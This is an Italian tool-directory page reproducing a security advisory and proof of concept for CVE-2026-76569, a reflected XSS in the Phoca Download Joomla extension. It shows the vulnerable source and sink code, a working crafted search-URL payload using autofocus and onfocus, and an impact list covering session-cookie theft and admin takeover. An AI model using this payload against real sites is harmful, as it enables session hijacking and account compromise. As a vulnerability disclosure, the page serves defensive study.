Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-76569 — XSS riflesso tramite parametro GET di ricerca in Phoca Download | Kitploit
Strumenti/GitHubGitHub/toanln-cov/cve-2026-76569
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubtoanln-cov/cve-2026-76569

CVE-2026-76569

XSS riflesso tramite parametro GET di ricerca in Phoca Download

Vedi Repository
421 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

XSS Riflesso tramite Parametro GET di Ricerca in Phoca Download

Phoca Download ≤ 6.1.4 — Un Attaccante Autenticato Esegue JavaScript Arbitrario tramite URL di Ricerca Appositamente Creato nel Pannello di Controllo Utente

CVE CVSS v4.0 CWE-79 Affected Researcher


SOMMARIO

Phoca Download (com_phocadownload) per Joomla contiene una vulnerabilità di Cross-Site Scripting (XSS) riflesso nella funzionalità di ricerca file del Pannello di Controllo Utente. Il parametro GET search viene elaborato con il filtro 'string' di Joomla — che chiama solo e preserva il carattere — e poi viene stampato senza all'interno di un attributo HTML . Un attaccante può iniettare attributi HTML arbitrari e gestori di eventi che vengono eseguiti nel browser della vittima al caricamento della pagina, senza richiedere alcuna interazione da parte dell'utente oltre al clic su un link appositamente creato.

strip_tags()
"
htmlspecialchars()
<input value="">

VERSIONI INTERESSATE

COMPONENTEVULNERABILETESTATO SUCORRETTO
com_phocadownload≤ 6.1.4Joomla 5 + PhocaDownload 6.1.4 + MariaDB 10.66.1.5

DETTAGLI DELLA VULNERABILITÀ

Tipo: Cross-Site Scripting riflesso (CWE-79) Autenticazione richiesta: Utente Joomla registrato (con accesso effettuato) + Pannello di Controllo Utente abilitato (enable_user_cp = 1) Token CSRF richiesto: Non richiesto — richiesta GET, nessun token CSRF verificato su questo percorso File sink: site/views/user/tmpl/default_files_bootstrap.php

Causa Principale

Il parametro search viene letto utilizzando il filtro 'string' di Joomla, che chiama solo strip_tags(). Questo preserva il carattere ", consentendo a un attaccante di uscire dal contesto dell'attributo value="" e iniettare attributi HTML arbitrari.

SITE/VIEWS/USER/VIEW.HTML.PHP:252 — SORGENTE

root@kitploit:~
$search_files = $app->getUserStateFromRequest(
    $this->_context_files.'.search', 'search', '', 'string'
);
$search_files = StringHelper::strtolower($search_files);
$lists_files['search'] = $search_files;  // memorizzato senza codifica

SITE/VIEWS/USER/TMPL/DEFAULT_FILES_BOOTSTRAP.PHP:56 — SINK (VULNERABILE)

root@kitploit:~
<input type="text" name="search" id="pdsearch"
    value="<?php echo $this->t['listsfiles']['search'];?>"
    class="form-control" />

La vista gemella phocadownloadlinkfile (stessa estensione) applica correttamente PhocaDownloadUtils::filterValue($search, 'text') — equivalente a htmlspecialchars() — per lo stesso campo di ricerca. La vista user non applica la stessa protezione, indicando una codifica di output incoerente all'interno dell'estensione.


PROVA DI CONCETTO

1. Accedi come Utente Registrato

Naviga alla pagina di accesso di Joomla e autenticati come utente Registrato. Dopo l'accesso riuscito, Joomla reindirizza alla pagina del profilo utente, confermando una sessione attiva.

Accesso riuscito come testuser — reindirizzato alla pagina del profilo

2. Accedi al Pannello di Controllo Utente (Stato di Base)

Naviga al Pannello di Controllo Utente di PhocaDownload:

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user

La pagina viene visualizzata con un campo di ricerca vuoto (value=""). Questo è lo stato normale prima dell'iniezione.

Pannello di Controllo Utente — campo di ricerca vuoto, stato di base

3. Invia URL Appositamente Creato con Payload XSS

Naviga al seguente URL appositamente creato (oppure digita direttamente il payload grezzo nella casella di ricerca):

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user&search=%22%20autofocus%20onfocus%3Dalert%28document.domain%29%20x%3D

URL appositamente creato con payload XSS inviato al parametro di ricerca

Mentre la pagina viene caricata, l'attributo autofocus iniettato focalizza l'elemento di input, attivando immediatamente il gestore di eventi onfocus. Non è richiesta alcuna ulteriore interazione da parte dell'utente.

HTML visualizzato (vulnerabile):

root@kitploit:~
<input type="text" name="search" id="pdsearch"
  value="" autofocus onfocus=alert(document.domain) x="
  class="form-control" />

IMPATTO

  1. Dirottamento della Sessione — Un attaccante può rubare il cookie di sessione Joomla della vittima tramite document.cookie, consentendo la completa compromissione dell'account senza credenziali.
  2. Esecuzione di JavaScript Arbitrario — Qualsiasi JavaScript viene eseguito nella sessione del browser della vittima — keylogging, manipolazione del DOM, raccolta di credenziali e reindirizzamenti a pagine di phishing sono tutti possibili.
  3. Escalation dei Privilegi — Se un amministratore fa clic sul link appositamente creato mentre è autenticato, l'attaccante ottiene l'esecuzione di JavaScript a livello di amministratore, consentendo potenzialmente la completa compromissione del sito tramite azioni del pannello amministrativo.

RIFERIMENTI

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76569
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76569
  • Avviso GitHub: https://github.com/advisories/GHSA-99wr-9r6w-w242
  • Repository del Fornitore: https://github.com/PhocaDesign/PhocaDownload
Scarica lo strumento